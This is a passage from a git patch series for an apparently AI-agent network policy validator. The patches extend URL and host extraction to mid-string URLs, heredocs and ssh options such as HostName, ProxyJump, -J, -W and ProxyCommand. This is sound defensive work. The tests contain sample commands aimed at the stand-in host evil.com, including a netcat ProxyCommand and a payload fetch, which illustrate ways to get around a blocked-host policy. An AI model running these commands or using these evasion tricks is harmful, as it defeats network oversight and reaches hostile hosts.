+		// string itself). The recursive scan catches URLs embedded mid-string
+		// in shell commands — e.g. `curl "see https://evil.com here"`,
+		// `echo "https://..."`, heredocs — that the token-aware extractor
+		// would miss because they don't parse as a clean bash token. Union
+		// the results so neither path can be bypassed independently.
+		const urls = extractUrlsFromValue(args);
+		const command = args.command;
 		if (typeof command === "string") {
 			urls.push(...extractUrlsFromShellCommand(command));
 		}
-		return urls;
+		return [...new Set(urls)];
 	}
 
 	return extractUrlsFromValue(args);
diff --git a/test/safety/network-policy-validator.test.ts b/test/safety/network-policy-validator.test.ts
index 964b5edb5..17d612204 100644
--- a/test/safety/network-policy-validator.test.ts
+++ b/test/safety/network-policy-validator.test.ts
@@ -536,7 +536,12 @@ describe("network policy validator", () => {
 		expect(result.allowed).toBe(true);
 	});
 
-	it("ignores URL literals in non-network shell commands", async () => {
+	it("catches URL literals embedded in shell commands", async () => {
+		// Even when the URL appears in a non-network command like echo, we
+		// still scan command strings for blocked hosts. This protects against
+		// mid-string URLs (e.g. `curl "see https://..."`, heredocs, prose
+		// containing URLs piped into network commands) that the bash-token
+		// parser would otherwise miss.
 		const result = await checkNetworkPolicy(
 			{
 				toolName: "bash",
@@ -545,7 +550,8 @@ describe("network policy validator", () => {
 			{ blockedHosts: ["evil.com"] },
 		);
 
-		expect(result.allowed).toBe(true);
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
 	});
 
 	it("does not let a decoy URL hide an opaque network target", async () => {
@@ -637,7 +643,10 @@ describe("network policy validator", () => {
 		expect(result.reason).toContain("blocked by enterprise policy");
 	});
 
-	it("ignores inert URLs in non-network shell commands", async () => {
+	it("blocks inert-looking URLs in shell commands when the host is denylisted", async () => {
+		// Even if the shell command isn't directly a network invocation, an
+		// embedded URL referencing a denylisted host should be rejected — the
+		// command could pipe into curl/wget, get evaluated, or be expanded.
 		const result = await checkNetworkPolicy(
 			{
 				toolName: "bash",
@@ -646,7 +655,8 @@ describe("network policy validator", () => {
 			{ blockedHosts: ["evil.com"] },
 		);
 
-		expect(result.allowed).toBe(true);
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
 	});
 
 	it("allows SSH user@host targets when the host is allowlisted", async () => {
@@ -684,4 +694,42 @@ describe("network policy validator", () => {
 
 		expect(result.allowed).toBe(true);
 	});
+
+	it("catches URLs embedded mid-string in shell commands (Codex P1 regression)", async () => {
+		// curl "see https://evil.com here" — the shell tokenizer strips
+		// quotes and yields the token `see https://evil.com here`, which the
+		// bash-token URL extractor rejects (it doesn't look like a host
+		// target). The recursive URL scan over the command string must catch
+		// this so the policy isn't bypassed.
+		const curlResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: 'curl "see https://evil.com here"' },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const echoResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: 'echo "see https://evil.com for details"' },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const heredocResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command: "cat <<EOF\nfetch https://evil.com/payload\nEOF",
+				},
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(curlResult.allowed).toBe(false);
+		expect(curlResult.reason).toContain("blocked by enterprise policy");
+		expect(echoResult.allowed).toBe(false);
+		expect(echoResult.reason).toContain("blocked by enterprise policy");
+		expect(heredocResult.allowed).toBe(false);
+		expect(heredocResult.reason).toContain("blocked by enterprise policy");
+	});
 });

From e36ce741596e58172ffabb4d1d17ec2f517134b0 Mon Sep 17 00:00:00 2001
From: Jonathan Haas <jonathan@haas.holdings>
Date: Sun, 14 Jun 2026 09:34:39 -0700
Subject: [PATCH 4/4] fix(safety): validate ssh -o HostName/ProxyJump/-J/-W
 option destinations

OpenSSH lets `-o HostName=evil.com github.com`, `-J evil.com github.com`,
or `-W evil.com:22 jumpbox` override the positional host, so the real
connection goes somewhere policy never sees. Walk these options, extract
the destination host (or recurse into ProxyCommand/RemoteCommand shell),
and return them alongside the positional target so callers re-validate.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 src/utils/url-extractor.ts       | 133 ++++++++++++++++++++++++++++++-
 test/utils/url-extractor.test.ts |  52 ++++++++++++
 2 files changed, 183 insertions(+), 2 deletions(-)

diff --git a/src/utils/url-extractor.ts b/src/utils/url-extractor.ts
index dc92076ed..4706cdb1e 100644
--- a/src/utils/url-extractor.ts
+++ b/src/utils/url-extractor.ts
@@ -1202,12 +1202,16 @@ function networkTargetArgs(
 		return targets.slice(0, 1);
 	}
 
+	if (commandName === "ssh" || commandName === "sftp") {
+		const positional = targets.slice(0, 1);
+		const optionTargets = sshOptionTargets(args);
+		return [...positional, ...optionTargets];
+	}
+
 	if (
 		commandName === "nc" ||
 		commandName === "ncat" ||
 		commandName === "netcat" ||
-		commandName === "ssh" ||
-		commandName === "sftp" ||
 		commandName === "telnet" ||
 		commandName === "ftp"
 	) {
@@ -1217,6 +1221,131 @@ function networkTargetArgs(
 	return targets;
 }
 
+/**
+ * OpenSSH config keys whose values designate a network destination. The
+ * `-o KEY=VALUE` (or `-oKEY=VALUE`) option overrides the positional host, so
+ * we must validate these values too — otherwise `ssh -o HostName=evil.com
+ * github.com` would only be checked against `github.com` while the actual
+ * connection targets `evil.com`. Keys are matched case-insensitively, matching
+ * OpenSSH behavior.
+ */
+const SSH_DESTINATION_OPTION_KEYS = new Set([
+	"hostname",
+	"proxyjump",
+	"proxycommand",
+	"remotecommand",
+]);
+
+function extractHostFromOptionValue(key: string, value: string): string[] {
+	const lowered = key.toLowerCase();
+	if (!SSH_DESTINATION_OPTION_KEYS.has(lowered)) {
+		return [];
+	}
+	const trimmed = value.trim().replace(/^["']|["']$/g, "");
+	if (!trimmed) {
+		return [];
+	}
+	if (lowered === "proxyjump") {
+		// ProxyJump accepts a comma-separated list of [user@]host[:port] hops.
+		return trimmed
+			.split(",")
+			.map((hop) => hop.trim())
+			.filter(Boolean);
+	}
+	if (lowered === "proxycommand" || lowered === "remotecommand") {
+		// Commands are opaque arbitrary shell — recursively extract any hosts
+		// they reference so policy enforcement can still see them.
+		return extractUrlsFromShellCommand(trimmed);
+	}
+	return [trimmed];
+}
+
+function sshOptionTargets(args: string[]): string[] {
+	const targets: string[] = [];
+
+	for (let index = 0; index < args.length; index += 1) {
+		const arg = args[index]!;
+		if (arg === "--") {
+			break;
+		}
+
+		// -o KEY=VALUE (split across two tokens) or -oKEY=VALUE (glued).
+		if (arg === "-o") {
+			const next = args[index + 1];
+			if (next) {
+				const eq = next.indexOf("=");
+				if (eq > 0) {
+					targets.push(
+						...extractHostFromOptionValue(
+							next.slice(0, eq),
+							next.slice(eq + 1),
+						),
+					);
+				}
+				index += 1;
+			}
+			continue;
+		}
+		if (arg.startsWith("-o") && arg.length > 2) {
+			const rest = arg.slice(2);
+			const eq = rest.indexOf("=");
+			if (eq > 0) {
+				targets.push(
+					...extractHostFromOptionValue(rest.slice(0, eq), rest.slice(eq + 1)),
+				);
+			}
+			continue;
+		}
+
+		// -J host (ProxyJump shorthand) or -Jhost
+		if (arg === "-J") {
+			const next = args[index + 1];
+			if (next) {
+				targets.push(...extractHostFromOptionValue("proxyjump", next));
+				index += 1;
+			}
+			continue;
+		}
+		if (arg.startsWith("-J") && arg.length > 2) {
+			targets.push(...extractHostFromOptionValue("proxyjump", arg.slice(2)));
+			continue;
+		}
+
+		// -W host:port (forward) or -Whost:port. The port is irrelevant for host
+		// policy — strip it before treating the value as a host target.
+		if (arg === "-W") {
+			const next = args[index + 1];
+			if (next) {
+				targets.push(stripWForwardPort(next));
+				index += 1;
+			}
+			continue;
+		}
+		if (arg.startsWith("-W") && arg.length > 2) {
+			targets.push(stripWForwardPort(arg.slice(2)));
+		}
+	}
+
+	return targets.filter(Boolean);
+}
+
+function stripWForwardPort(value: string): string {
+	const trimmed = value.trim().replace(/^["']|["']$/g, "");
+	if (!trimmed) {
+		return "";
+	}
+	// IPv6 literal: [host]:port — keep the brackets, drop the trailing :port.
+	if (trimmed.startsWith("[")) {
+		const closing = trimmed.indexOf("]");
+		if (closing !== -1) {
+			return trimmed.slice(0, closing + 1);
+		}
+		return trimmed;
+	}
+	const colon = trimmed.lastIndexOf(":");
+	return colon === -1 ? trimmed : trimmed.slice(0, colon);
+}
+
 function nextGitSubcommandToken(
 	args: string[],
 ): { subcommand: string; args: string[] } | null {
diff --git a/test/utils/url-extractor.test.ts b/test/utils/url-extractor.test.ts
index 82022b9f1..3da3b184c 100644
--- a/test/utils/url-extractor.test.ts
+++ b/test/utils/url-extractor.test.ts
@@ -304,6 +304,58 @@ describe("extractUrlsFromShellCommand", () => {
 			]);
 		});
 
+		it("extracts hosts from ssh -o option values that override the destination", () => {
+			// -o HostName=evil.com overrides the positional host: the real
+			// connection goes to evil.com, not github.com.
+			expect(
+				extractUrlsFromShellCommand("ssh -o HostName=evil.com github.com"),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+			// Glued -oKEY=VALUE form, with case-insensitive key.
+			expect(
+				extractUrlsFromShellCommand("ssh -oHostname=evil.com github.com"),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+			// User prefix on the positional should not mask the option override.
+			expect(
+				extractUrlsFromShellCommand("ssh -o HostName=evil.com user@github.com"),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+		});
+
+		it("extracts ProxyJump hops from -J and -o ProxyJump=", () => {
+			expect(
+				extractUrlsFromShellCommand("ssh -J evil.com user@github.com"),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+			expect(
+				extractUrlsFromShellCommand("ssh -Jevil.com user@github.com"),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+			expect(
+				extractUrlsFromShellCommand(
+					"ssh -o ProxyJump=jump1.evil.com,jump2.evil.com github.com",
+				),
+			).toEqual(
+				expect.arrayContaining([
+					"http://jump1.evil.com",
+					"http://jump2.evil.com",
+				]),
+			);
+		});
+
+		it("extracts hosts referenced by ssh ProxyCommand option values", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					'ssh -o ProxyCommand="nc evil.com 22" github.com',
+				),
+			).toEqual(expect.arrayContaining(["http://evil.com"]));
+		});
+
+		it("extracts forward hosts from ssh -W host:port", () => {
+			expect(extractUrlsFromShellCommand("ssh -W evil.com:22 jumpbox")).toEqual(
+				expect.arrayContaining(["http://evil.com"]),
+			);
+			expect(extractUrlsFromShellCommand("ssh -Wevil.com:22 jumpbox")).toEqual(
+				expect.arrayContaining(["http://evil.com"]),
+			);
+		});
+
 		it("extracts escaped network command names", () => {
 			expect(extractUrlsFromShellCommand("c\\url http://evil.com")).toEqual([
 				"http://evil.com",